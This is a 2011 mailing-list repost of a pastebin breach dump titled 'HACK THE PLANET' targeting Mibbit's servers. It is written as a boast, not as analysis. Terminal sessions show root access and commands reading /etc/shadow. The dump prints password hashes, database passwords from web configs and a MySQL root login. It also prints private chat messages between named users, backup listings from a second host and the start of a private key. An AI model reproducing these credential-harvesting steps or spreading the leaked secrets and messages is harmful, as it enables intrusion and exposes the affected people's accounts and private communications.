[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201108140116.p7E1G8Al023739@post.webmailer.de>
Date: Sun, 14 Aug 2011 01:16:08 GMT
From: h@...the.planet
To: full-disclosure@...ts.grok.org.uk
Subject: HACK THE PLANET | Mibbit
From: http://pastebin.com/z8iMAEeX
HACK THE PLANET
:: Table of Contents ::
0x01 ~ Preface
0x02 ~ tools.mibbit.com
- 0x03 ~ PM logs
0x04 ~ status.mibbit.com
0x05 ~ sidewinder.netonecom.net
0x06 ~ d0x
0x07 ~ exit
:: 0x01 - Preface ::
You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't? Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec. However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from Lulzsec releases.
Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit fueling Lulzsec/#antisec efforts. Enjoy.
- HTP
targ3t:
- Mibbit
0wn3d:
- Axod Azander Havvy
- Hercule Joshua Kitsune
- Molkmin Pottsi Sindacious
:: 0x02 - 0wnage - tools.mibbit.com ::
[h@ck ~]$ ssh root@...ls.mibbit.com
root@...ls.mibbit.com's password:
Last login: Fri Aug 12 23:16:22 2011 from [redacted]
root@...ls:~# uname -a
Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
root@...ls:~# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
ntp:x:102:104::/home/ntp:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:105:107::/var/spool/exim4:/bin/false
root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
daemon:*:14728:0:99999:7:::
bin:*:14728:0:99999:7:::
sys:*:14728:0:99999:7:::
sync:*:14728:0:99999:7:::
games:*:14728:0:99999:7:::
man:*:14728:0:99999:7:::
lp:*:14728:0:99999:7:::
mail:*:14728:0:99999:7:::
news:*:14728:0:99999:7:::
uucp:*:14728:0:99999:7:::
proxy:*:14728:0:99999:7:::
www-data:*:14728:0:99999:7:::
backup:*:14728:0:99999:7:::
list:*:14728:0:99999:7:::
irc:*:14728:0:99999:7:::
gnats:*:14728:0:99999:7:::
nobody:*:14728:0:99999:7:::
libuuid:!:14728:0:99999:7:::
syslog:*:14728:0:99999:7:::
ntp:*:14728:0:99999:7:::
sshd:*:14728:0:99999:7:::
wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
mysql:!:15048:0:99999:7:::
Debian-exim:!:15075:0:99999:7:::
root@...ls:~# ps aux | grep log
root 201 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/0]
root 202 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/1]
root 203 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/2]
root 204 0.0 0.0 0 0 ? S Mar15 0:00 [xfslogd/3]
syslog 9019 0.0 0.2 21200 1288 ? Sl Mar15 1:35 rsyslogd -c4
wwwadmin 18565 0.0 0.6 5056 3360 ? S Mar31 22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
root@...ls:~# ls -al /
total 96
drwxr-xr-x 22 root root 4096 Mar 15 22:22 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxrwxrwx 20 root root 4096 Aug 6 23:14 OLD_DATA
drwxr-xr-x 2 root root 4096 Mar 15 12:19 bin
drwxr-xr-x 2 root root 4096 Apr 29 2010 boot
drwxr-xr-x 11 root root 13640 Mar 15 12:20 dev
drwxr-xr-x 76 root root 4096 Aug 13 01:26 etc
drwxr-xr-x 3 root root 4096 Mar 15 12:31 home
drwxr-xr-x 17 root root 12288 Aug 9 00:38 lib
drwx------ 2 root root 16384 Apr 29 2010 lost+found
drwxr-xr-x 2 root root 4096 Apr 29 2010 media
drwxr-xr-x 2 root root 4096 Apr 23 2010 mnt
drwxr-xr-x 2 root root 4096 Apr 29 2010 opt
dr-xr-xr-x 117 root root 0 Mar 15 12:04 proc
drwx------ 4 root root 4096 Aug 13 02:32 root
drwxr-xr-x 2 root root 4096 Mar 15 12:20 sbin
drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
drwxr-xr-x 2 root root 4096 Apr 29 2010 srv
drwxr-xr-x 12 root root 0 Mar 15 12:04 sys
drwxrwxrwt 4 root root 4096 Aug 12 08:40 tmp
drwxr-xr-x 11 root root 4096 Aug 9 00:44 usr
drwxr-xr-x 15 root root 4096 Aug 9 00:44 var
root@...ls:~# ls -al /home
total 12
drwxr-xr-x 3 root root 4096 Mar 15 12:31 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
root@...ls:~# ls -al /home/wwwadmin
total 1076
drwxr-xr-x 7 wwwadmin wwwadmin 4096 Aug 12 16:13 .
drwxr-xr-x 3 root root 4096 Mar 15 12:31 ..
-rw-r--r-- 1 wwwadmin wwwadmin 5014 Aug 7 20:51 .bash_history
-rw-r--r-- 1 wwwadmin wwwadmin 220 Apr 19 2010 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3136 Aug 7 17:39 .bashrc
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:10 .cache
-rw-r--r-- 1 wwwadmin wwwadmin 19 Jan 29 2009 .hercpw
-rw-r--r-- 1 wwwadmin wwwadmin 148 Apr 11 2010 .htpasswd
-rw------- 1 wwwadmin wwwadmin 177 Aug 6 15:34 .lesshst
-rw------- 1 wwwadmin wwwadmin 214 Mar 16 20:20 .mysql_history
-rw------- 1 wwwadmin wwwadmin 55 Mar 16 18:19 .php_history
-rw-r--r-- 1 wwwadmin wwwadmin 700 Mar 15 20:55 .profile
-rw-r--r-- 1 wwwadmin wwwadmin 66 Mar 31 16:37 .selected_editor
drwx------ 2 wwwadmin wwwadmin 4096 Mar 15 20:53 .ssh
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Mar 15 21:20 .vim
-rw------- 1 wwwadmin wwwadmin 13346 Aug 12 16:13 .viminfo
-rw-r--r-- 1 wwwadmin wwwadmin 4425 Mar 15 20:53 .vimrc
-rw-r--r-- 1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Apr 16 15:01 kenneth
drwxr-xr-x 10 wwwadmin wwwadmin 4096 Aug 13 02:00 loggerbot
-rw-r--r-- 1 wwwadmin wwwadmin 45 Apr 5 20:40 test.php
root@...ls:~# ls -al /OLD_DATA
total 132
drwxrwxrwx 20 root root 4096 Aug 6 23:14 .
drwxr-xr-x 22 root root 4096 Mar 15 22:22 ..
drwxr-xr-x 2 root root 4096 Mar 15 10:46 bin
drwxr-xr-x 2 root root 4096 Oct 20 2008 boot
drwxr-xr-x 4 root root 8192 Mar 15 09:49 dev
drwxr-xr-x 76 root root 4096 Mar 15 10:46 etc
drwxr-xr-x 5 root root 4096 Jan 12 2009 home
drwxr-xr-x 12 root root 8192 Mar 15 10:46 lib
drwx------ 2 root root 16384 Nov 25 2008 lost+found
drwxr-xr-x 2 root root 4096 Nov 25 2008 media
drwxr-xr-x 2 root root 4096 Oct 20 2008 mnt
drwxr-xr-x 2 root root 4096 Nov 25 2008 opt
drwxr-xr-x 2 root root 4096 Oct 20 2008 proc
drwxr-xr-x 3 root root 4096 Mar 7 22:29 root
drwxr-xr-x 2 root root 4096 Mar 15 10:46 sbin
-rw------- 1 root root 31903 Jan 12 2009 sql0swW3A
drwxr-xr-x 2 root root 4096 Nov 25 2008 srv
drwxr-xr-x 2 root root 4096 Oct 14 2008 sys
drwxrwxrwt 4 root root 4096 Mar 15 09:49 tmp
drwxr-xr-x 11 root root 4096 Dec 9 2008 usr
drwxr-xr-x 15 root root 4096 Dec 17 2008 var
root@...ls:~# ls -al /OLD_DATA/home
total 20
drwxr-xr-x 5 root root 4096 Jan 12 2009 .
drwxrwxrwx 20 root root 4096 Aug 6 23:14 ..
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 ircadmin
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Oct 12 2009 mibbit
drwxr-xr-x 8 1002 1002 4096 Mar 15 09:29 wwwadmin
root@...ls:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
total 146816
drwxr-xr-x 13 1001 1001 4096 Mar 15 10:46 .
drwxr-xr-x 5 root root 4096 Jan 12 2009 ..
-rw------- 1 1001 1001 14707 Mar 14 23:29 .bash_history
-rw-r--r-- 1 1001 1001 220 May 12 2008 .bash_logout
-rw-r--r-- 1 1001 1001 3115 May 12 2008 .bashrc
-rw------- 1 1001 1001 41 Jun 1 2010 .lesshst
-rw------- 1 1001 1001 256 Mar 12 14:44 .nano_history
-rw-r--r-- 1 1001 1001 675 May 12 2008 .profile
drwxr-xr-x 2 1001 1001 4096 Mar 7 23:44 .ssh
-rw------- 1 1001 1001 821 May 21 2009 .viminfo
drwxr-xr-x 13 1001 1001 4096 Jan 5 2010 Unreal3.2.7
drwx------ 13 1001 1001 4096 Apr 13 2009 Unreal3.2.8
drwx------ 13 1001 1001 4096 Dec 22 2010 Unreal3.2.8.1
-rw-r--r-- 1 1001 1001 8181760 Sep 9 2009 Unreal3.2.8.1.tar
-rw-r--r-- 1 1001 1001 8181760 Apr 7 2009 Unreal3.2.8.tar
drwxr-xr-x 7 1001 1001 4096 Feb 3 2009 anope-1.8.0-rc1
drwxr-xr-x 8 1001 1001 4096 Jan 7 2009 bopm
drwxr-xr-x 5 1001 1001 4096 Jan 7 2009 bopm-3.1.3
-rw------- 1 1001 1001 1475 Jul 30 2009 dead.letter
drwxr-xr-x 2 1001 1001 8192 Mar 12 14:44 dronebl
drwxr-xr-x 3 1001 1001 4096 May 4 2009 hub
drwxr-xr-x 9 1001 1001 4096 Mar 15 10:46 infobot-0.45.3
-rw-r--r-- 1 1001 1001 81 Jan 26 2010 irc.us.mibbit.net.txt
-rw-r--r-- 1 1001 1001 132744770 Feb 28 2010 ircd.tgz
-rw-r--r-- 1 1001 1001 623 Oct 27 2009 jim
-rw------- 1 1001 1001 949701 Feb 8 2010 mbox
drwxr-xr-x 7 1001 1001 4096 Jan 26 2010 services
:: 0x03 - PM logs - tools.mibbit.com ::
root@...ls:~# mysql -u root -ped4e5c6e88e5
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 95641
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use www;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
jared -> molkmin: can the admins tell when users PM each other on this network?
jared -> molkmin: (with mibbit)
molkmin -> jared: who do you wnat to know is saying what?
jared -> molkmin: but they don't have to know that :)
>>> karma motherfuck3r
molkmin -> alpha: not that I can see
molkmin -> alpha: I wasn't watching
molkmin -> alpha: it hardly matters :)
alpha -> molkmin: just silenced them
alpha -> molkmin: :)
molkmin -> alpha: everyone in #chat is assholes :)
alpha -> molkmin: lol
alpha -> molkmin: thanks
>>> thX
jared -> molkmin: i've seen some scary botnets on dalnet
jared -> molkmin: they could knock you off the server in less than a second
molkmin -> jared: I've never had that happen yet
molkmin -> jared: I have a mac
>>> ??
jared -> molkmin: VNCing into a linux box
jared -> molkmin: with a windows virtualbox guest
jared -> molkmin: to use the VPN
jared -> molkmin: to connect to a terminal server at work
jared -> molkmin: friggin ridiculous
molkmin -> jared: get a freaking mac
jared -> molkmin: how would that help?
>>> ...
[h@ck ~]$ wc mibbitpms.out
51610 493903 2955301 mibbitpms.out
[h@ck ~]$ wc mibbitchanmsgs.out
622607 4558597 32539145 mibbitchanmsgs.out
>>> f1les @ 0x07 <<<
:: 0x04 - status.mibbit.com ::
[h@ck ~]$ ssh wwwadmin@...tus.mibbit.com
wwwadmin@...tus.mibbit.com's password:
Last login: Fri Aug 12 21:18:51 2011 from [redacted]
wwwadmin@...tus:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
mibbit:x:1000:1000::/home/mibbit:/bin/bash
wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
jimmy:x:1003:1003::/home/jimmy:/bin/bash
bind:x:107:109::/var/cache/bind:/bin/false
wwwadmin@...tus:~$ ls -alt /
total 92
drwxrwxrwt 4 root root 4096 Aug 13 07:25 tmp
drwxr-xr-x 78 root root 4096 Aug 13 01:14 etc
drwxr-xr-x 21 root root 4096 Jul 7 07:40 .
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 11 root root 12760 Jul 7 07:40 dev
drwxr-xr-x 11 root root 0 Jul 7 07:40 sys
dr-xr-xr-x 99 root root 0 Jul 7 07:40 proc
drwxr-xr-x 2 root root 4096 May 29 23:11 bin
drwxr-xr-x 15 root root 12288 May 29 23:11 lib
drwx------ 3 root root 4096 May 29 23:11 root
drwxr-xr-x 2 root root 4096 Nov 6 2010 sbin
drwxr-xr-x 6 root root 4096 Mar 4 2010 home
drwxr-xr-x 11 root root 4096 Sep 30 2009 usr
drwxr-xr-x 14 root root 4096 Aug 11 2009 var
drwxr-xr-x 2 root root 4096 Apr 23 2009 media
drwxr-xr-x 2 root root 4096 Apr 23 2009 opt
drwxr-xr-x 2 root root 4096 Apr 23 2009 srv
drwx------ 2 root root 16384 Apr 23 2009 lost+found
drwxr-xr-x 2 root root 4096 Apr 13 2009 boot
drwxr-xr-x 2 root root 4096 Apr 13 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 6 2009 selinux
wwwadmin@...tus:~$ ls -alt /home
total 24
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 wwwadmin
drwxr-xr-x 21 root root 4096 Jul 7 07:40 ..
drwxr-xr-x 7 mibbit mibbit 4096 Jun 29 13:30 mibbit
drwxr-xr-x 4 zfreebies zfreebies 4096 Apr 29 2010 zfreebies
drwxr-xr-x 3 jimmy jimmy 4096 Mar 8 2010 jimmy
drwxr-xr-x 6 root root 4096 Mar 4 2010 .
wwwadmin@...tus:~$ ls -alt
total 52
drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
-rw------- 1 wwwadmin wwwadmin 120 Aug 12 05:15 .nano_history
drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug 7 18:29 .ssh
-rw------- 1 wwwadmin wwwadmin 6566 Aug 7 15:02 .bash_history
drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26 2011 wiki_new
drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25 2011 wiki_backup_25Jan
lrwxrwxrwx 1 root root 31 Jan 17 2011 blog -> /var/www/blog.mibbit.com/htdocs
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10 2010 WP_BACKUP
drwxr-xr-x 6 root root 4096 Mar 4 2010 ..
lrwxrwxrwx 1 wwwadmin wwwadmin 32 Sep 13 2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
-rw-r--r-- 1 wwwadmin wwwadmin 220 Mar 2 2009 .bash_logout
-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar 2 2009 .bashrc
-rw-r--r-- 1 wwwadmin wwwadmin 675 Mar 2 2009 .profile
wwwadmin@...tus:~$ ls -alt /var/www/
total 56
drwxr-xr-x 4 root root 4096 May 12 2010 www.stopitmovies.com
drwxr-xr-x 13 root root 4096 May 12 2010 .
drwxr-xr-x 4 root root 4096 Mar 24 2010 status.mibbit.com
drwxr-xr-x 4 root root 4096 Mar 16 2010 a.mibbit.com
drwxr-xr-x 6 root root 4096 Feb 19 2010 blog.mibbit.com
drwxr-xr-x 4 root root 4096 Dec 23 2009 adminwiki.mibbit.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.rollered.com
drwxr-xr-x 4 root root 4096 Oct 12 2009 www.wizzig.com
drwxr-xr-x 4 www-data www-data 4096 Oct 12 2009 www.axod.net
drwxr-xr-x 5 root root 4096 Sep 30 2009 www.zfreebies.com
drwxr-xr-x 5 root root 4096 Sep 15 2009 forum.zfreebies.co.uk
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 wiki.mibbit.com
-rw-r--r-- 1 root root 45 Aug 11 2009 index.html
drwxr-xr-x 14 root root 4096 Aug 11 2009 ..
wwwadmin@...tus:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
@mysql_select_db("adverts", $sql);
wwwadmin@...tus:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
<?
$sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
wwwadmin@...tus:~$ ls -alt /var/www/blog.mibbit.com/htdocs
total 308
drwxr-xr-x 5 wwwadmin wwwadmin 4096 Nov 15 2010 .
-rw-r--r-- 1 wwwadmin www-data 655 Nov 15 2010 favicon.ico
drwxr-xr-x 5 wwwadmin www-data 4096 Feb 23 2010 wp-content
-rw-r--r-- 1 wwwadmin www-data 1548 Feb 19 2010 wp-config.php
-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19 2010 xmlrpc.php
-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19 2010 wp-settings.php
-rw-r--r-- 1 wwwadmin www-data 3693 Feb 19 2010 wp-trackback.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rss.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-rss2.php
-rw-r--r-- 1 wwwadmin www-data 7578 Feb 19 2010 wp-mail.php
-rw-r--r-- 1 wwwadmin www-data 487 Feb 19 2010 wp-pass.php
-rw-r--r-- 1 wwwadmin www-data 218 Feb 19 2010 wp-rdf.php
-rw-r--r-- 1 wwwadmin www-data 316 Feb 19 2010 wp-register.php
-rw-r--r-- 1 wwwadmin www-data 2341 Feb 19 2010 wp-load.php
-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19 2010 wp-login.php
drwxr-xr-x 6 wwwadmin www-data 4096 Feb 19 2010 wp-includes
-rw-r--r-- 1 wwwadmin www-data 1946 Feb 19 2010 wp-links-opml.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-feed.php
-rw-r--r-- 1 wwwadmin www-data 1253 Feb 19 2010 wp-cron.php
-rw-r--r-- 1 wwwadmin www-data 238 Feb 19 2010 wp-commentsrss2.php
-rw-r--r-- 1 wwwadmin www-data 2616 Feb 19 2010 wp-config-sample.php
-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19 2010 wp-app.php
-rw-r--r-- 1 wwwadmin www-data 220 Feb 19 2010 wp-atom.php
-rw-r--r-- 1 wwwadmin www-data 274 Feb 19 2010 wp-blog-header.php
-rw-r--r-- 1 wwwadmin www-data 3928 Feb 19 2010 wp-comments-post.php
drwxr-xr-x 8 wwwadmin www-data 4096 Feb 19 2010 wp-admin
-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19 2010 license.txt
-rw-r--r-- 1 wwwadmin www-data 7644 Feb 19 2010 readme.html
-rw-r--r-- 1 wwwadmin www-data 397 Feb 19 2010 index.php
drwxr-xr-x 6 root root 4096 Feb 19 2010 ..
wwwadmin@...tus:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
<?php
// ** MySQL settings ** //
define('DB_NAME', 'wpblog'); // The name of the database
define('DB_USER', 'wpuser'); // Your MySQL username
define('DB_PASSWORD', '13c3cada3921'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
wwwadmin@...tus:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
total 720
-rw-rw-r-- 1 www-data www-data 6960 Mar 21 12:46 LocalSettings.php
drwxrwxr-x 9 www-data www-data 4096 Mar 21 12:41 extensions
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 26 2011 SpamBlacklist
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 .
drwxrwxr-x 22 www-data www-data 4096 Jan 26 2011 images
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 bin
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 config
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 docs
drwxrwxr-x 17 www-data www-data 4096 Jan 26 2011 includes
drwxrwxr-x 4 www-data www-data 4096 Jan 26 2011 languages
drwxrwxr-x 13 www-data www-data 12288 Jan 26 2011 maintenance
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 math
drwxrwxr-x 2 www-data www-data 4096 Jan 26 2011 serialized
drwxrwxr-x 10 www-data www-data 4096 Jan 26 2011 skins
drwxr-xr-x 2 wwwadmin wwwadmin 4096 Jan 4 2011 cache
-rw-r--r-- 1 wwwadmin wwwadmin 59433 Jan 4 2011 RELEASE-NOTES
-rw-r--r-- 1 wwwadmin wwwadmin 2090 Jan 4 2011 CREDITS
-rw-r--r-- 1 wwwadmin wwwadmin 8821 Jan 4 2011 profileinfo.php
-rw-rw-r-- 1 root root 655 Nov 15 2010 favicon.ico
-rw-r--r-- 1 wwwadmin wwwadmin 13307 Mar 25 2010 UPGRADE
-rw-r--r-- 1 wwwadmin wwwadmin 392287 Mar 12 2010 HISTORY
-rw-r--r-- 1 wwwadmin wwwadmin 4905 Mar 8 2010 thumb.php
-rw-r--r-- 1 wwwadmin wwwadmin 4707 Feb 15 2010 api.php
-rw-r--r-- 1 wwwadmin wwwadmin 174 Feb 3 2010 php5.php5
-rw-r--r-- 1 wwwadmin wwwadmin 89 Feb 3 2010 redirect.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 86 Feb 3 2010 wiki.phtml
-rw-r--r-- 1 wwwadmin wwwadmin 4329 Jan 1 2010 index.php
-rw-r--r-- 1 wwwadmin wwwadmin 4031 Oct 14 2009 img_auth.php
-rw-rw-r-- 1 www-data www-data 9416 Sep 13 2009 mibbit.png
-rw-rw-r-- 1 www-data www-data 1049 Sep 13 2009 AdminSettings.php
drwxrwxr-x 5 www-data www-data 4096 Sep 13 2009 ..
-rw-r--r-- 1 wwwadmin wwwadmin 76 Jul 27 2009 FAQ
drwxrwxr-x 4 www-data www-data 4096 Jul 13 2009 t
drwxrwxr-x 2 www-data www-data 4096 Jul 13 2009 tests
-rw-r--r-- 1 wwwadmin wwwadmin 648 May 7 2009 StartProfiler.sample
-rw-rw-r-- 1 www-data www-data 3952 Mar 21 2009 install-utils.inc
-rw-r--r-- 1 wwwadmin wwwadmin 3054 Mar 21 2009 opensearch_desc.php
-rw-r--r-- 1 wwwadmin wwwadmin 383 Mar 21 2009 redirect.php
-rw-r--r-- 1 wwwadmin wwwadmin 32 Mar 16 2009 trackback.php5
-rw-rw-r-- 1 www-data www-data 603 Jan 7 2009 StartProfiler.php
-rw-r--r-- 1 wwwadmin wwwadmin 3649 Nov 11 2008 README
-rw-r--r-- 1 wwwadmin wwwadmin 1347 Nov 5 2008 trackback.php
-rw-r--r-- 1 wwwadmin wwwadmin 4138 Apr 18 2008 INSTALL
-rw-rw-r-- 1 www-data www-data 618 Apr 11 2008 Makefile
-rw-r--r-- 1 wwwadmin wwwadmin 39 Mar 3 2008 opensearch_desc.php5
-rw-r--r-- 1 wwwadmin wwwadmin 25 Feb 4 2008 api.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 img_auth.php5
-rw-r--r-- 1 wwwadmin wwwadmin 28 Feb 4 2008 index.php5
-rw-r--r-- 1 wwwadmin wwwadmin 31 Feb 4 2008 redirect.php5
-rw-r--r-- 1 wwwadmin wwwadmin 29 Feb 4 2008 thumb.php5
-rw-r--r-- 1 wwwadmin wwwadmin 17997 Apr 5 2006 COPYING
wwwadmin@...tus:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikiuser";
$wgDBpassword = "a69e74574db6";
$wgDBport = "5432";
$wgDBprefix = "";
$wgDBadminuser = "wikiuser";
$wgDBadminpassword = "a69e74574db6";
# Schemas for Postgres
$wgDBmwschema = "mediawiki";
$wgDBts2schema = "public";
wwwadmin@...tus:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
## Database settings
$wgDBtype = "mysql";
$wgDBserver = "localhost";
$wgDBname = "wikiadmindb";
$wgDBuser = "wikiadminuser";
$wgDBpassword = "fe102b0d7793";
# MySQL specific settings
$wgDBprefix = "";
# MySQL table options to use during installation or update
wwwadmin@...tus:~$ exit
Connection to status.mibbit.com closed.
:: 0x05 - sidewinder.netonecom.net ::
backup@...ewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
total 596
drwxr-xr-x 16 backup root 432 2011-08-12 18:52 .
drwxr-xr-x 26 root root 632 2011-05-12 14:12 ..
drwxr-xr-x 2 backup users 1344 2009-08-27 10:44 amram
drwxr-xr-x 2 root root 587920 2011-08-13 12:37 awstats
-rw------- 1 backup 1452 17 2006-09-18 14:47 .bash_history
drwxr-xr-x 2 backup users 224 2009-10-07 12:58 hornet
drwxr-xr-x 2 backup users 1336 2010-08-24 11:23 ice
drwxr-xr-x 2 backup users 1216 2010-11-12 16:07 janco
drwxr-xr-x 3 backup users 264 2011-08-13 01:27 magic
drwxr-xr-x 3 backup users 1416 2011-07-26 12:32 merlin
drwxr-xr-x 2 backup users 1432 2011-05-16 05:55 multimag
drwxr-xr-x 2 backup users 1640 2010-10-11 15:49 phantom
drwxr-xr-x 2 backup users 1680 2011-01-13 15:57 sidewinder
drwx------ 2 backup users 320 2011-08-12 18:52 .ssh
drwxr-xr-x 2 backup users 1176 2009-10-14 10:52 sydex
-rw------- 1 backup 1452 4999 2011-08-12 18:52 .viminfo
backup@...ewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII
-----BEGIN DSA PRIVATE KEY-----
